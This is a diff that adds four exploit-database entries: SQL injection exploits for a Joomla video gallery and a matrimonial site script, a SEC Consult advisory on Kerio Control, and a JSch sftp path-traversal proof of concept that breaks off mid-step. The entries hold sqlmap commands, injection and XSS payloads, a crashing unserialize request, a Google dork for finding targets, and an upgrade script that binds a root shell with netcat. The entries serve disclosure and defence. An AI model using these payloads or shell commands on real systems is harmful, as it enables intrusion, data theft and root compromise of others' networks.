diff --git a/platforms/php/webapps/40413.txt b/platforms/php/webapps/40413.txt
new file mode 100755
index 000000000..ab446c468
--- /dev/null
+++ b/platforms/php/webapps/40413.txt
@@ -0,0 +1,76 @@
+Title: Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla
+Author: Larry W. Cashdollar, @_larry0
+Date: 2016-09-15
+Download Site: http://huge-it.com/joomla-video-gallery/
+Vendor: www.huge-it.com, fixed v1.1.0
+Vendor Notified: 2016-09-17
+Vendor Contact: info@huge-it.com
+Description: A video slideshow gallery.
+Vulnerability:
+The following code does not prevent an unauthenticated user from injecting SQL into functions located in ajax_url.php. 
+
+Vulnerable Code in : ajax_url.php
+
+ 11 define('_JEXEC',1);
+ 12 defined('_JEXEC') or die('Restircted access');
+.
+.
+.
+ 28         if($_POST['task']=="load_videos_content"){
+ 29 
+ 30             $page = 1;
+ 31 
+ 32 
+ 33             if(!empty($_POST["page"]) && is_numeric($_POST['page']) && $_POST['page']>0){
+ 34                 $paramssld='';
+ 35                 $db5 = JFactory::getDBO();
+ 36                 $query5 = $db->getQuery(true);
+ 37                 $query5->select('*');
+ 38                 $query5->from('#__huge_it_videogallery_params');
+ 39                 $db->setQuery($query5);
+ 40                 $options_params = $db5->loadObjectList();
+ 41                 foreach ($options_params as $rowpar) {
+ 42                     $key = $rowpar->name;
+ 43                     $value = $rowpar->value;
+ 44                     $paramssld[$key] = $value;
+ 45                 }
+ 46                 $page = $_POST["page"];
+ 47                 $num=$_POST['perpage'];
+ 48                 $start = $page * $num - $num;
+ 49                 $idofgallery=$_POST['galleryid'];
+ 50 
+ 51                 $query = $db->getQuery(true);
+ 52                 $query->select('*');
+ 53                 $query->from('#__huge_it_videogallery_videos');
+ 54                 $query->where('videogallery_id ='.$idofgallery);
+ 55                 $query ->order('#__huge_it_videogallery_videos.ordering asc');
+ 56                 $db->setQuery($query,$start,$num);
+
+CVE-2016-1000123
+Exploit Code:
+  aC/ $ sqlmap -u 'http://server/components/com_videogallerylite/ajax_url.php' --data="page=1&galleryid=*&task=load_videos_content&perpage=20&linkbutton=2"  --level=5 --risk=3
+  aC/ .
+  aC/ .
+  aC/ .
+  aC/ (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
+  aC/ sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests:
+  aC/ ---
+  aC/ Parameter: #1* ((custom) POST)
+  aC/     Type: error-based
+  aC/     Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
+  aC/     Payload: page=1&galleryid=-3390 OR 1 GROUP BY CONCAT(0x716b766271,(SELECT (CASE WHEN (2575=2575) THEN 1 ELSE 0 END)),0x7170767071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&task=load_videos_content&perpage=20&linkbutton=2
+  aC/  
+  aC/     Type: AND/OR time-based blind
+  aC/     Title: MySQL >= 5.0.12 time-based blind - Parameter replace
+  aC/     Payload: page=1&galleryid=(CASE WHEN (5952=5952) THEN SLEEP(5) ELSE 5952 END)&task=load_videos_content&perpage=20&linkbutton=2
+  aC/ ---
+  aC/ [19:36:55] [INFO] the back-end DBMS is MySQL
+  aC/ web server operating system: Linux Debian 8.0 (jessie)
+  aC/ web application technology: Apache 2.4.10
+  aC/ back-end DBMS: MySQL >= 5.0.12
+  aC/ [19:36:55] [WARNING] HTTP error codes detected during run:
+  aC/ 500 (Internal Server Error) - 2714 times
+  aC/ [19:36:55] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.4'
+  aC/  
+  aC/ [*] shutting down at 19:36:55
+Advisory: http://www.vapidlabs.com/advisory.php?v=169
\ No newline at end of file
diff --git a/platforms/php/webapps/40414.txt b/platforms/php/webapps/40414.txt
new file mode 100755
index 000000000..462371638
--- /dev/null
+++ b/platforms/php/webapps/40414.txt
@@ -0,0 +1,507 @@
+SEC Consult has also released a blog post describing the attack scenarios
+of the vulnerabilities within this advisory in detail and a video which
+shows the remote attack. Exploit code has been developed as well but will
+not be released for now.
+
+Blog:
+http://blog.sec-consult.com/2016/09/controlling-kerio-control-when-your.html
+
+Video:
+https://www.youtube.com/watch?v=y_OWz25sHMI
+
+
+SEC Consult Vulnerability Lab Security Advisory < 20160922-0 >
+=======================================================================
+              title: Potential backdoor access through multiple vulnerabilities
+            product: Kerio Control Unified Threat Management
+ vulnerable version: <9.1.3, verified in version 9.1.0 build 1087 and 9.1.1
+                     build 1324
+      fixed version: 9.1.3 (partially fixed, see vendor statement below)
+         CVE number: -
+             impact: critical
+           homepage: http://www.kerio.com/
+              found: 2016-08-24
+                 by: R. Freingruber (Office Vienna)
+                     R. Tavakoli (Office Vienna)
+                     SEC Consult Vulnerability Lab
+
+                     An integrated part of SEC Consult
+                     Bangkok - Berlin - Linz - Montreal - Moscow
+                     Singapore - Vienna (HQ) - Vilnius - Zurich
+
+                     https://www.sec-consult.com
+
+=======================================================================
+
+Vendor description:
+-------------------
+"Protect your network from viruses, malware and malicious activity
+with Kerio Control, the easy-to-administer yet powerful all-in-one
+security solution.
+Kerio Control brings together next-generation firewall capabilities -
+including a network firewall and router, intrusion detection and
+prevention (IPS), gateway anti-virus, VPN, and web contentand
+application filtering. These comprehensive capabilities and unmatched
+deployment flexibility make Kerio Control the ideal choice for small
+and mid-sized businesses."
+
+Source: http://www.kerio.com/products/kerio-control
+
+
+Business recommendation:
+------------------------
+By combining the vulnerabilities documented in this advisory an attacker
+can fully compromise a network which uses the Kerio Control appliance for
+protection.
+
+The attacker can trick a victim to visit a malicious website which then conducts
+the internal attack. The attacked victim must be logged in or weak credentials
+must be configured which can be found with a bruteforce attack.
+
+The attacker will gain a reverse root shell from the Internet to the internal
+Kerio Control firewall system. Moreover, it's possible that an internal attacker
+uses the described vulnerabilities to escalate his privileges (low privileged
+account to full root shell) to steal credentials from other users on the UTM
+appliance.
+
+Most vulnerabilities (RCE, CSRF bypasses, XSS, Heap Spraying) were found
+in just two PHP scripts. Both scripts are not referenced by any other
+PHP script nor by any binary on the system.
+Both scripts contain a different(!), seemingly deliberate(?) CSRF bypass
+which make the vulnerabilities exploitable from the Internet to obtain a
+reverse root shell.
+
+SEC Consult recommends not to use Kerio Control until a thorough security
+review has been performed by security professionals and all identified
+issues have been resolved.
+
+
+Vulnerability overview/description:
+-----------------------------------
+1) Unsafe usage of the PHP unserialize function and outdated PHP version leads
+   to remote-code-execution
+An authenticated user (standard user or administrator) can control data, which
+gets later unserialized. Kerio Control uses PHP 5.2.13 which was released on
+2010-02-25. This version is more than 6 years old and several bugs were found
+in the meantime within the unserialize function. The following CVE numbers
+are just some examples for vulnerabilities in unserialize which lead to remote
+code execution:
+  -) CVE-2014-8142
+  -) CVE-2014-3515
+  -) CVE-2015-0231
+  -) CVE-2015-6834
+  -) CVE-2016-5771
+  -) CVE-2016-5773
+
+PHP 5.2.13 is especially affected by CVE-2014-3515. This vulnerability uses a
+type confusion attack to trigger a use-after-free vulnerability. It can be used
+to read data and get full code execution. In the case of Kerio Control the
+result of unserialize is not reflected back to the attacker. It's therefore not
+possible to read memory from the stack or heap (e.g. to bypass ASLR).
+
+Nevertheless, SEC Consult developed a fully working and reliable (blind) exploit
+for this vulnerability which spawns a reverse root shell to the Kerio Control
+system.
+For this exploit a user account is required. However, it's also possible to
+conduct the attack via the Internet because the CSRF (Cross Site Request
+Forgery) check can be bypassed (see below).
+
+An attacker can use this vulnerability to break into a company network via the
+Internet by tricking a logged in user to visit a malicious website. Even if the
+user is currently not logged in the attacker can start a bruteforce attack to
+obtain valid credentials to conduct the attack.
+
+
+2) PHP script allows heap spraying
+One of the PHP scripts allows the allocation of memory inside the main binary
+(winroute) of Kerio Control. Winroute contains the code of most services
+(e.g. the webserver, PHP, network related functionality, ...).
+The memory will not be freed after finishing the request and can therefore be
+used to spray payloads to the whole memory space.
+
+This vulnerability was used in the overall exploit to defeat ASLR.
+Please bear in mind that it's very likely that an attacker can write a working
+exploit without heap spraying. Fixing this vulnerability would therefore not
+prevent the exploitation of the remote code execution vulnerability.
+For example, the information disclosure vulnerability from this advisory can
+be used to bypass ASLR as well. This would eliminate the need of heap spraying.
+
+
+3) CSRF Protection Bypass
+The PHP scripts contain code to protect against CSRF (Cross Site Request
+Forgery) attacks. Because of the wrong usage of PHP binary
+operations and comparisons it's possible to bypass this check. That means
+that an attacker can trigger requests from other websites which will be handled
+by Kerio Control. This vulnerability allows to exploit the remote code
+execution vulnerability from the Internet to break into a network.
+
+
+4) Webserver running with root privileges
+The main binary (which contains the webserver and PHP) runs with root
+privileges.
+
+Kerio told SEC Consult that this vulnerability will not be fixed. SEC
+Consult strongly recommended otherwise.
+
+
+5) Reflected Cross Site Scripting (XSS)
+Kerio Control does not properly encode parameters which are reflected on the
+website. This leads to cross site scripting vulnerabilities.
+An attacker can abuse these vulnerabilities to modify the website or do actions
+in the context of the attacked user.
+
+
+6) Missing memory corruption protections
+The main binary (winroute) is not compiled as position-independent executable
+(PIE). This allowed the use of ROP (return-oriented-programming) code to
+bypass the not executable heap. Moreover, the stack is per default marked as
+executable, but the exact location of the stack is randomized by ASLR.
+
+
+7) Information Disclosure leads to ASLR bypass
+One of the PHP scripts leaks pointers to the stack and heap.
+This can be abused by attackers to bypass ASLR.
+Because stacks are marked as executable an attacker can therefore easily bypass
+ASLR and DEP/NX.
+
+
+8) Remote Code Execution as administrator
+Nearly a year ago on 2015-10-12 Raschin Tavakoli reported a remote code
+execution vulnerability in the administrative web interface in the upgrade
+functionality. This vulnerability is still unfixed, only the associated XSS
+vulnerability was fixed. However, an attacker can still exploit it from the
+Internet, e.g. by abusing the XSS vulnerability described in this advisory
+(where the CSRF check can be bypassed).
+
+With this vulnerability an attacker can gain a reverse root shell on
+Kerio Control again if a logged in administrator visits a malicious website
+on the Internet.
+More information can also be found in the old advisory:
+https://www.exploit-db.com/exploits/38450/
+
+
+9) Login not protected against brute-force attacks
+There are no bruteforce protections in place for the login.
+If an unauthenticated victim visits an attacker's website, the attacker can
+start a bruteforce attack to obtain valid credentials to execute the
+remote code execution exploit. Via image-loading the attacker can detect if
+the current credentials are valid (without violating SOP).
+
+
+Proof of concept:
+-----------------
+1) Unsafe usage of the PHP unserialize function and outdated PHP version leads
+   to remote-code-execution
+The following request can be used to set the unserialize data. In this example
+a faked string is used which points to 0xffffffff (kernel memory). Unserializing
+it will therefore crash the remote webserver (the winroute process).
+
+POST /set.php HTTP/1.1
+Host: $IP:4081
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Cookie: SESSION_CONTROL_WEBIFACE=<valid session ID>;
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 730
+
+k_securityHash=x&target=k_sessionVariable&k_variable=lastDisplayed&k_value=a:18:{s:8:"k_dbName";s:5:"error";s:11:"k_dbSummara";s:3:"abc";s:14:"k_dbIndividual";s:3:"abc";s:16:"k_dbLastUsedType";s:3:"abc";s:10:"k_dbLayout";s:3:"abc";s:10:"k_pageType";s:3:"abc";s:13:"k_periodStart";i:123;s:11:"k_periodEnd";i:123;s:8:"k_userId";i:123;s:6:"tabBar";i:123;s:13:"k_gotoElement";i:123;s:9:"k_protoId";i:123;s:11:"k_errorType";i:123;s:16:"k_timezoneOffset";i:123;s:9:"k_groupId";i:123;s:2:"id";i:123;s:11:"k_dbSummary";C:16:"SplObjectStorage":152:{x:i:2;O:8:"stdClass":1:{i:0;a:2:{i:1;i:1;i:2;i:2;}};d:2.0851592721051977e-262;;m:a:2:{i:0;S:15:"\ff\ff\ff\ff\20\00\00\00\01\00\00\00\06\00\00";i:1;R:3;}}s:18:"k_historyTimestamp";s:3:"abc";}
+
+The following request will call unserialize on the injected data:
+
+GET /contentLoader.php?k_getHistoryId=1&k_securityHash=x HTTP/1.1
+Host: $IP:4081
+Cookie: SESSION_CONTROL_WEBIFACE=<valid session ID>;
+Connection: close
+
+In the example above only a denial of service will be conducted. However, an
+attacker can change the data type to object to get full code execution on
+the remote system.
+
+SEC Consult developed a fully working exploit for this attack which spawns a
+root shell. Please note that this exploit was intentionally written to just
+target Kerio Control 9.1.0 Build 1087. This is because hardcoded offsets
+are used which belong to the winroute binary with the SHA256 hash:
+2808c35528b9a4713b91f65a881dfca03088de08b6331fdee1c698523bd757b0
+This exploit will not be released for now.
+
+A real-world-attacker can detect the remote binary version by bruteforcing
+the object handler related to CVE-2014-3515.
+
+
+2) PHP script allows heap spraying
+The set.php script contains the following code:
+$p_variable = urldecode($_POST['k_variable']);
+$p_value = urldecode($_POST['k_value']);
+...
+$p_session->setSessionVariable($p_variable, $p_value);
+
+POST requests with the following parameters can therefore be used to allocate
+space on the remote system:
+k_securityHash=x&target=k_sessionVariable&k_variable=<random_name>
+&k_value=<payload_to_allocate>
+
+During tests it was possible to spray approximately 400 MB data in 30 seconds
+which is enough to control two predictable addresses on the heap.
+
+
+3) CSRF Protection Bypass
+Two scripts are required for the remote code execution exploit:
+  -) set.php
+  -) ContentLoader.php
+Both scripts contain different very interesting CSRF check bypasses.
+
+The following code can be found in set.php:
+$p_session->getCsrfToken(&$p_securityHash);
+$p_postedHash = $_GET['k_securityHash'] || $_POST['k_securityHash'];
+if ('' == $p_postedHash || ($p_postedHash != $p_securityHash)) {
+exit();
+}
+
+Since the programming language is PHP (and not JavaScript), the above code code
+does not work as expected. $p_postedHash can only become 0 or 1 because || is a
+logical operator. The if-condition compares the valid token with the posted one
+via the != operator, however, this will not check if types are the same.
+If k_securityHash is set (either via GET or POST) to any value, the above code
+will compare the number 1 with a string, which will always bypass the check.
+It's therefore enough to set k_securityHash to any value to bypass the CSRF
+protection.
+
+The following code can be found in contentLoader.php:
+$p_session->getCsrfToken(&$p_securityHash);
+$p_postedHash = $_GET['k_securityHash'];
+...
+if (!$p_session || ('' == $p_postedHash && $p_postedHash != $p_securityHash)) {
+$p_page = new p_Page();
+$p_page->p_jsCode('window.top.location = "index.php";');
+$p_page->p_showPageCode();
+die();
+}
+
+Now the programmers only use the GET parameter, however, they changed the
+logical operator in the if condition from || to && which means that the CSRF
+check will only be applied if $p_postedHash is empty. It's therefore again
+enough to set k_securityHash to any value to bypass the check.
+
+
+4) Webserver running with root privileges
+No proof of concept necessary.
+
+
+5) Reflected Cross Site Scripting (XSS)
+In the following request the k_historyTimestamp parameter is prone to XSS:
+https://<IP>:4081/contentLoader.php?k_dbName=x&k_securityHash=x
+&k_historyTimestamp=aa%22;alert(1)%3b//
+
+In the same request the id parameter can be used to inject JavaScript code.
+Note that the attack can only be conducted against administrative users.
+Users with standard privileges can only access pages with k_dbName set to one
+of the following values:
+  -) accStats
+  -) prefs
+  -) dialup
+  -) error
+
+In such a case Kerio Control adds code like the following
+(in this example k_dbName=dialup):
+var k_newDbName = "<kerio:text id="tabCaption_dialup"/>";
+
+The " characters within the string are not correctly encoded.
+This will lead to the termination of the JavaScript execution. Because the
+injected payload is stored after this code, the attacker must bypass this
+code to ensure that the payload gets executed. This is only possible if
+the attacked user is an administrator because administrators can load any
+dbName. By setting k_dbName to an invalid dbName (e.g. to 'x'), code like
+the following will be added instead (which does not crash):
+var k_newDbName = "";
+
+Another XSS can be found at:
+https://<IP>:4081/admin/internal/dologin.php?hash=%0D%0A"><script>alert(1);</script><!--
+
+
+6) Missing memory corruption protections
+No proof of concept necessary.
+
+
+7) Information Disclosure leads to ASLR bypass
+The following request returns information to the currently logged in user
+(e.g. session token and username):
+
+GET /nonauth/getLoginType.js.php HTTP/1.1
+Host: $IP:4081
+Cookie: SESSION_CONTROL_WEBIFACE=<valid session ID>;
+Connection: close
+
+The following is a typical response:
+
+HTTP/1.1 200 OK
+Connection: Close
+Content-type: text/html
+Date: Tue, 24 Aug 2016 11:47:34 GMT
+Server: Kerio Control Embedded Web Server
+X-UA-Compatible: IE=edge
+
+k_loginParams.k_loginType = "loginUnlock";k_loginParams.k_nonauthToken =
+"0xb59066a8";k_loginParams.k_sessionToken =
+"bc7c9ae78f01e498b7c935b4ad521b664d4e2c5574bde30cdf57851a58763660";k_loginParams.k_loggedUser
+= {k_asocName: "user", k_fullName: "user"};
+
+The above response contains a valid pointer (0xb59066a8). In most cases this
+pointer will point to the heap. However, sometimes this pointer will point
+into a readable and writeable region behind a stack-region.
+The target location always stores the same data. During the analysis no
+further effort was spent on analysing this behaviour.
+
+The pointer will also be disclosed if the user is already logged out.
+In such a case the response looks like:
+
+HTTP/1.1 200 OK
+Connection: Close
+Content-type: text/html
+Date: Tue, 24 Aug 2016 12:04:44 GMT
+Server: Kerio Control Embedded Web Server
+X-UA-Compatible: IE=edge
+
+k_loginParams.k_loginType = "loginCommon";k_loginParams.k_nonauthToken =
+"0xb2ee208";
+
+
+An attack scenario can be:
+  -) The attacker tricks a victim to visit the attacker's malicious website
+  -) The attacker's website uses the CSRF bypass and the identified XSS
+     vulnerability to embed a malicious script inside the Kerio Control website
+  -) The attacker's website iframes the Kerio Control website to trigger the
+     execution of the XSS payload
+  -) The XSS payload runs on the same domain and can therefore send requests
+     and read responses. This means the attacker can send requests to
+     getLoginType.js.php to obtain a memory pointer.
+  -) If the memory pointer is within a specific range (e.g. the highest nibble
+     is zero), it's a pointer to the heap. In such a case the RCE vulnerability
+     can be used to crash and restart the server. After that the same check can
+     be done again.
+  -) If the memory pointer points near a stack (highest nibble is 0xb), the
+     pointer can be used to calculate the base address of a stack.
+  -) Now the attacker knows the location of a stack (all stacks are marked as
+     readable, writeable and executable). He can now easily bypass ASLR and DEP.
+
+
+8) Remote Code Execution as administrator
+An attacker can create a malicious upgrade image with the following
+commands:
+cat upgrade.sh
+#!/bin/bash
+nc -lp 9999 -e /bin/bash &
+
+tar czf upgrade.tar.gz *
+mv upgrade.tar.gz upgrade.img
+
+The image can be uploaded in the administrative web interface.
+This will bind a root shell on port 9999. The complete attack can also be
+conducted via the cross site scripting vulnerability described in this
+advisory (XSS in contentLoader.php). This enables an attacker to conduct
+the attack from the Internet to obtain a reverse shell on Kerio Control.
+
+
+9) Login not protected against brute-force attacks
+Valid credentials can be obtained via a brute-force attack.
+It's enough to send a POST request to /internal/dologin.php with the
+parameters kerio_username and kerio_password set. A remote attacker
+can detect if the credentials are correct without reading the
+response (SOP would not allow to read the response). This is possible
+because /internal/photo will only return a valid image if the user is
+currently logged in. The attacker can load an image from this URL and
+check if loading was successful to leak the information if the
+credentials are valid or not.
+The following code demonstrates this:
+<img src="https://<Kerio-IP>/internal/photo" onerror=not_logged_in();
+onload=logged_in();></img>
+
+
+Vulnerable / tested versions:
+-----------------------------
+The following product versions were found to be vulnerable which were the
+latest versions available at the time of the discovery:
+v9.1.0 (Build 1087)
+v9.1.1 (Build 1324)
+
+
+Vendor contact timeline:
+------------------------
+2016-08-29: Contacting vendor through website
+            (bug report: bugreports@support.kerio.com) Ticket-ID: MYW-768664
+2016-08-31: No answer, contacting CTO of Kerio via email
+2016-09-01: Received security contact with PGP & S/MIME certificate
+2016-09-01: Transmission of PGP encrypted advisory to Kerio
+2016-09-09: Received answer, Kerio confirms vulnerabilities 1,2,3,5,6,7
+            Statement to vulnerability 9:
+            "the feature already is in the product."
+            Statement to vulnerabilities 4 (Webserver running with root
+            privileges) and 8 (Remote Code Execution as administrator):
+            "I do not consider this a vulnerability"
+            Update including a fix will be available on 2016-09-20
+2016-09-09: SEC Consult informed Kerio to re-think the decision
+            not fixing the vulnerabilities 4, 8 and 9
+            SEC Consult highly recommends to fix all reported issues
+2016-09-13: SEC Consult informed Kerio that the advisory will be
+            released on 2016-09-22
+2016-09-20: Kerio releases patch for Kerio Control
+2016-09-22: Coordianted release of security advisory
+
+
+Solution:
+---------
+The vendor has released version 9.1.3 on 20th September which, according
+to the vendor, fixes the vulnerabilities 1,2,3,5,6,7.
+
+The vendor told us the following regarding vulnerability 9:
+"the feature already is in the product"
+
+Vulnerability 4 and 8 are not considered a vulnerability by the vendor
+and will not be fixed.
+SEC Consult strongly recommended fixing issue 4 and 8 as well.
+
+The latest version can be downloaded from here:
+http://www.kerio.com/support/kerio-control
+http://www.kerio.com/support/kerio-control/release-history
+
+
+Workaround:
+-----------
+None
+
+
+Advisory URL:
+-------------
+https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
+
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+SEC Consult Vulnerability Lab
+
+SEC Consult
+Bangkok - Berlin - Linz - Montreal - Moscow
+Singapore - Vienna (HQ) - Vilnius - Zurich
+
+About SEC Consult Vulnerability Lab
+The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
+ensures the continued knowledge gain of SEC Consult in the field of network
+and application security to stay ahead of the attacker. The SEC Consult
+Vulnerability Lab supports high-quality penetration testing and the evaluation
+of new offensive and defensive technologies for our customers. Hence our
+customers obtain the most current information about vulnerabilities and valid
+recommendation about the risk profile of new technologies.
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Interested to work with the experts of SEC Consult?
+Send us your application https://www.sec-consult.com/en/Career.htm
+
+Interested in improving your cyber security with the experts of SEC Consult?
+Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Mail: research at sec-consult dot com
+Web: https://www.sec-consult.com
+Blog: http://blog.sec-consult.com
+Twitter: https://twitter.com/sec_consult
+
+EOF R. Freingruber / @2016
\ No newline at end of file
diff --git a/platforms/php/webapps/40416.txt b/platforms/php/webapps/40416.txt
new file mode 100755
index 000000000..eeb973a27
--- /dev/null
+++ b/platforms/php/webapps/40416.txt
@@ -0,0 +1,48 @@
+######################
+# Application Name : Matrimonial Website Script v1.0.2
+
+# Google Dork : inurl:viewfullprofile1.php?id=
+
+# Exploit Author : Cyber Warrior | Bug Researchers Group | N4TuraL
+
+# Author Contact : https://twitter.com/byn4tural
+
+# Vendor Homepage : http://www.i-netsolution.com/
+
+# Vulnerable Type : SQL Injection
+
+# Date : 2016-09-22
+
+# Tested on : Windows 10 / Mozilla Firefox
+#             Linux / Mozilla Firefox
+#             Linux / sqlmap 1.0.6.28#dev
+
+###################### SQL Injection Vulnerability ######################
+
+# Location :
+http://localhost/[path]/viewfullprofile1.php
+
+######################
+
+# PoC Exploit:
+
+http://localhost/[path]/viewfullprofile1.php?id=MM57711%20and%20%2F*%2130000if%28exists%28select%20concat%280x7233646D3076335F73716C5F696E6A656374696F6E%2Ccount%28*%29%29%20from%20%3F%3F%3F.%E7%AE%A1%E7%90%86%E5%91%98%29%2CBENCHMARK%281161102%2C8%2CMD5%280x41%29%29%2C0%29*%2F
+
+http://localhost/[path]/viewfullprofile1.php?id=MM57711%27%20AND%205860%3DIF%28%28ORD%28MID%28%28IFNULL%28CAST%28DATABASE%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C1%29%29%3E1%29%2CSLEEP%285%29%2C5860%29%20AND%20%27wvYf%27%3D%27wvYf
+
+# Exploit Code via sqlmap:
+
+sqlmap -u http://localhost/[path]/viewfullprofile1.php?id=MM57711 --dbs
+
+Parameter: id (GET)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: id=MM57711' AND 2424=2424 AND 'PgBT'='PgBT
+
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload: id=MM57711' AND SLEEP(5) AND 'AgXd'='AgXd
+---
+
+######################
+
diff --git a/platforms/windows/dos/40411.txt b/platforms/windows/dos/40411.txt
new file mode 100755
index 000000000..8bcb943d5
--- /dev/null
+++ b/platforms/windows/dos/40411.txt
@@ -0,0 +1,236 @@
+Ref:        https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-5725
+Version:    0.3
+Date:       Aug 31st, 2016
+
+Complete Proof of Concept:
+https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-5725
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40411.zip
+
+Tag:        jsch recursive sftp get client-side windows path traversal
+
+Overview
+--------
+
+Name:           jsch
+Vendor:         jcraft
+References:     * http://www.jcraft.com/jsch/ [1]
+
+Version:        0.1.53 [2]
+Latest Version: 0.1.54 [2]
+Other Versions: <= 0.1.53 
+Platform(s):    windows
+Technology:     java
+
+Vuln Classes:   CWE-22 Improper Limitation of a Pathname to a Restricted
+Directory ('Path Traversal')
+Origin:         remote
+Min. Privs.:    post auth
+
+CVE:            CVE-2016-5725
+
+
+
+Description
+---------
+
+quote website [1]
+
+> JSch is a pure Java implementation of SSH2. JSch allows you to connect
+ to an sshd server and use port forwarding, X11 forwarding, file transfer,
+etc., and you can integrate its functionality into your own Java programs.
+ JSch is licensed under BSD style license.
+
+We have recognized that the following applications have used JSch.
+
+  * Ant(1.6 or later).
+    JSch has been used for Ant's sshexec and scp tasks.
+  * Eclipse(3.0).
+    Our Eclipse-CVSSSH2 plug-in has been included in Eclipse SDK 3.0. 
+    This plug-in will allow you to get ssh2 accesses to remote CVS
+repository
+    by JSch.
+  * NetBeans 5.0(and later)
+  * Jakarta Commons VFS
+  * Maven Wagon
+  * Rational Application Devloper for WebSphere Software
+  * HP Storage Essentials
+  * JIRA
+  * Trac WikiOutputStreamPlugin
+
+
+Summary
+-------
+
+A malicious sftp server may force a client-side relative path traversal in
+jsch's implementation for recursive sftp-get allowing the server to write
+files outside the clients download basedir with effective permissions of the
+jsch sftp client process. 
+
+* affects recursive get, i.e. sftp <host>:</path>/* .
+* post-auth
+* file overwrite capability depends on the client specified mode: 
+  `ChannelSftp.get(...,mode==ChannelSftp.OVERWRITE)`
+* windows only
+
+see attached PoC
+
+Details
+-------
+
+  * examples/Sftp.java::main::
+    c.get(p1, p2, monitor, mode);
+   * ChannelSftp.java::get(String src, String dst, 
+                           SftpProgressMonitor monitor, int mode)
+    * ChannelSftp.java::_get(src,dst,monitor,mode,skip)
+
+Source
+------
+
+see ref github.
+
+Proof of Concept
+----------------
+
+see ref github.
+
+poc:
+
+1. run `poc.py` to spawn the ssh/sftp stub listening for new connections 
+   on `0.0.0.0:3373`:
+
+poc.py --host=0.0.0.0 --port=3373 -l DEBUG -k test_rsa.key
+
+INFO:__main__:[cve-2016-5725] sftp server starting... 
+INFO:__main__:* generating fake files
+INFO:__main__:** /..\..\totally_malicious_script
+INFO:__main__:* setting up sftp server
+INFO:__main__:* monkey patching: chattr
+INFO:__main__:* monkey patching: list_folder
+INFO:__main__:* monkey patching: mkdir
+INFO:__main__:* monkey patching: open
+INFO:__main__:* monkey patching: remove
+INFO:__main__:* monkey patching: rename
+INFO:__main__:* monkey patching: rmdir
+INFO:__main__:* monkey patching: stat
+INFO:__main__:* monkey patching: symlink
+INFO:__main__:* starting sftp server...
+0.0.0.0 3373
+
+2. connect to `poc.py` using jsch sftp-client example `examples/Sftp.java`
+   (any user, user password):
+
+sftp> 
+
+3. issue a recursive get (any remote folder will do for the PoC) to store
+   all files from `remote:fancyfolder` to `.`.
+
+Note: output may contain additional debug information not enabled by default
+      in `examples/Sftp.java`
+Note: pwd is `<path>\workspace-ee\jsch`
+Note: local output folder is `.` (`<path>\workspace-ee\jsch`)  
+
+sftp> get fancyfolder/* .
+
+3. client connects to `poc.py` with subsystem sftp
+
+DEBUG:paramiko.transport:starting thread (server mode): 0x350afd0L
+DEBUG:paramiko.transport:Local version/idstring: SSH-2.0-paramiko_2.0.0
+DEBUG:paramiko.transport:Remote version/idstring: SSH-2.0-JSCH-0.1.53
+INFO:paramiko.transport:Connected (version 2.0, client JSCH-0.1.53)
+DEBUG:paramiko.transport:kex algos:[u'ecdh-sha2-nistp256', ...
+DEBUG:paramiko.transport:Kex agreed: diffie-hellman-group1-sha1
+DEBUG:paramiko.transport:Cipher agreed: aes128-ctr
+DEBUG:paramiko.transport:MAC agreed: hmac-md5
+DEBUG:paramiko.transport:Compression agreed: none
+DEBUG:paramiko.transport:kex engine KexGroup1 specified hash_algo ...
+DEBUG:paramiko.transport:Switch to new keys ...
+DEBUG:paramiko.transport:Auth request (type=none) ...
+INFO:paramiko.transport:Auth rejected (none).
+DEBUG:paramiko.transport:Auth request (type=password) ...
+INFO:paramiko.transport:Auth granted (password).
+DEBUG:paramiko.transport:[chan 0] Max packet in: 32768 bytes
+DEBUG:paramiko.transport:[chan 0] Max packet out: 32768 bytes
+DEBUG:paramiko.transport:Secsh channel 0 (session) opened.
+DEBUG:paramiko.transport:Starting handler for subsystem sftp
+
+  
+4. jsch sftp-client command `get fancyfolder/* .` calls
+`opendir(/fancyfolder)`
+   on the PoC sftp server which responds with a fake filelist for
+`fancyfolder`
+   listing the file `/..\..\totally_malicious_script`. 
+ 
+DEBUG:paramiko.transport.sftp:[chan 0] Started sftp server on channel 
+      <paramiko.Channel 0 (open) window=2097152 -> <paramiko.Transport 
+      at 0x350afd0L (cipher aes128-ctr, 128 bits) (active; 1 open
+channel(s))>> DEBUG:paramiko.transport.sftp:[chan 0] Request: realpath
+DEBUG:paramiko.transport.sftp:[chan 0] Request: opendir INFO:__main__:LIST
+(u'/fancyfolder'): [<SFTPAttributes: [ size=44 uid=0 
+      gid=9 mode=0100666 atime=1472758892 mtime=1472758897 ]>]
+DEBUG:paramiko.transport.sftp:[chan 0] Request: readdir
+DEBUG:paramiko.transport.sftp:[chan 0] Request: readdir
+DEBUG:paramiko.transport.sftp:[chan 0] Request: close
+
+5. jsch sftp-client recursively downloads the files listed in the response
+   to `opendir(/fancyfolder)` (sftp-get) by
+   calling `stat`, `open` and `read` on the file.
+
+a) jsch sftp-client calls `stat` on the filename as returned by the servers
+   response to `opendir` (with traversal): 
